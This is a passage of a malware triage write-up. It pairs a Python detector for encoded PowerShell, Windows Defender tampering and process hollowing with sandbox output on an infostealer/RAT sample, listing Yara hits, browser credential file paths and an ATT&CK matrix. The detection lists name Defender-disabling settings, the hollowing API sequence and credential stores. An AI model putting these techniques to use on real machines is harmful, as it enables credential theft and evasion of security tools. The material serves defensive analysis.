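    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00416FC6 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle',
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings this example recognises (assumption, extend as needed).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# Set-/Add-MpPreference parameters this example treats as Defender tampering (assumption).
DEFENDER_TAMPER_PARAMS = (
    "ExclusionPath", "ExclusionProcess", "ExclusionExtension",
    "DisableRealtimeMonitoring", "DisableBehaviorMonitoring",
    "DisableIOAVProtection", "DisableScriptScanning",
)

# Ordered API subsequence used as the hollowing signature (assumption; suffix-free names).
HOLLOWING_SEQUENCE = (
    "CreateProcess", "GetThreadContext", "NtUnmapViewOfSection",
    "VirtualAllocEx", "WriteProcessMemory", "SetThreadContext", "ResumeThread",
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -enc argument the way PowerShell does: base64 of UTF-16LE text."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        if len(raw) % 2:  # UTF-16 needs an even byte count
            return None
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def defender_tampering_findings(script: str) -> List[str]:
    """Name the Defender settings a decoded script changes; empty if none."""
    findings: List[str] = []
    if not re.search(r"(?i)\b(Set|Add)-MpPreference\b", script):
        return findings
    for param in DEFENDER_TAMPER_PARAMS:
        if re.search(rf"(?i)-{param}\b", script):
            findings.append(param)
    # An exclusion of a bare drive root (e.g. 'C:\') blinds Defender to the whole volume.
    if re.search(r"""(?i)-ExclusionPath\s+['"]?[A-Za-z]:\\?['"]?(?=\s|;|$)""", script):
        findings.append("DriveRootExclusion")
    return findings


def parse_code_function(line: str) -> List[str]:
    """Return the API names of a 'Code function:' record, dropping the function id."""
    _, _, chain = line.partition("Code function:")
    chain = re.sub(r"\(?\d+_\d+_[0-9A-Fa-f]{8}\b\)?", " ", chain)
    return [api.strip() for api in chain.split(",") if api.strip()]


def _normalize(api: str) -> str:
    """Drop the ANSI/Unicode suffix so CreateProcessA and CreateProcessW compare equal."""
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


def looks_like_process_hollowing(apis: List[str]) -> bool:
    """True when HOLLOWING_SEQUENCE occurs, in order, as a subsequence of the chain."""
    want = iter(HOLLOWING_SEQUENCE)
    step = next(want)
    for api in apis:
        if _normalize(api) == step:
            step = next(want, None)
            if step is None:
                return True
    return False


def triage(report_lines: List[str]) -> dict:
    """Summarise decoded commands, Defender tampering and hollowing functions."""
    result = {"decoded_commands": [], "defender_tampering": [], "hollowing_functions": []}
    for line in report_lines:
        if "Process created:" in line:
            decoded = decode_encoded_command(line)
            if decoded:
                result["decoded_commands"].append(decoded)
                result["defender_tampering"].extend(defender_tampering_findings(decoded))
        elif "Code function:" in line:
            if looks_like_process_hollowing(parse_code_function(line)):
                m = re.search(r"\d+_\d+_[0-9A-Fa-f]{8}", line)
                result["hollowing_functions"].append(m.group(0) if m else "?")
    return result


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Two caveats a responder should keep in mind when reading the decoded command: Set-MpPreference only succeeds from an elevated session, and on builds with Tamper Protection enabled the exclusion change is rejected; when it does succeed, an exclusion of 'C:\' removes the whole system drive, including the dropped Qerdo.exe and the hollowed InstallUtil.exe image, from scanning. The change itself is recorded as event 5007 in the Microsoft-Windows-Windows Defender/Operational log, and script block logging (event 4104) captures the decoded text even though the command line only shows the base64.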

          Stealing of Sensitive Information

          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040A1C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: \key3.db17_2_0040A1C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040A0A6

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: cmd.exe17_2_00405671
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          1
          Windows Service
          1
          Access Token Manipulation
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services11
          Archive Collected Data
          Exfiltration Over Other Network Medium11
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          1
          Windows Service
          11
          Deobfuscate/Decode Files or Information
          121
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol121
          Input Capture
          Exfiltration Over Bluetooth2
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Service Execution
          Logon Script (Windows)122
          Process Injection
          3
          Obfuscated Files or Information
          2
          Credentials In Files
          1
          System Service Discovery
          SMB/Windows Admin Shares2
          Clipboard Data
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell
          Logon Script (Mac)1
          Registry Run Keys / Startup Folder
          13
          Software Packing
          NTDS3
          File and Directory Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer1
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets33
          System Information Discovery
          SSHKeyloggingData Transfer Size Limits11
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common21
          Virtualization/Sandbox Evasion
          Cached Domain Credentials121
          Security Software Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync21
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job122
          Process Injection
          Proc Filesystem3
          Process Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
          Application Window Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
          System Owner/User Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
          Remote System Discovery
          Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
